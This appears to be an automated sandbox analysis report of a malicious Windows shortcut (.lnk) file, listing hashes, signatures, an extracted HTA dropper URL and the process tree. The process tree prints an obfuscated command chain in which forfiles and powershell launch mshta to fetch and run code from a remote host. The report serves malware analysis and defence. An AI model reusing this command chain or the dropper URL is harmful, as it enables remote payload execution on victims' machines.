Overview

overview

10

Static

static

1

c3dcd725be...5c.lnk

windows7-x64

7

c3dcd725be...5c.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 01:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk

  • Size

    272KB

  • MD5

    47c69db79640bcff28c4609d7cb9fdf1

  • SHA1

    9b7d6e44525f5c7b1ad0ad50232ae2f00ef19c21

  • SHA256

    c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c

  • SHA512

    97cfbb41da9521c45c4b204c0c8cc6a551921b39f052d4b68787668e4b16185c7e70e380c25fc05731a4c9fe2fa491682fc09ceee8dbf38a11b73f1ecaa83ee4

  • SSDEEP

    24:8Wi+1hAh52pyAzPkr+/4h+sPSLDgdd79ds6xmab/U3IVqm:8WTo8zmbQEdJ9KabU3Kq

Score
10/10
defense_evasion

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://siff-sd.com/temp/Docs-08-2024

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indirect Command Execution 1 TTPs 1 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . \*i*\*2\msh*e https://siff-sd.com/temp/Docs-08-2024
      2⤵
      • Indirect Command Execution
      • Suspicious use of WriteProcessMemory
      PID:1728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        . \*i*\*2\msh*e https://siff-sd.com/temp/Docs-08-2024
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4968
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" https://siff-sd.com/temp/Docs-08-2024
          4⤵
          • Blocklisted process makes network request
          PID:4960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ua5pn21j.blx.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/4968-0-0x00007FFD67A63000-0x00007FFD67A65000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4968-1-0x0000021EB7120000-0x0000021EB7142000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4968-11-0x00007FFD67A60000-0x00007FFD68521000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4968-12-0x00007FFD67A60000-0x00007FFD68521000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4968-15-0x00007FFD67A60000-0x00007FFD68521000-memory.dmp

    Filesize

    10.8MB

    Download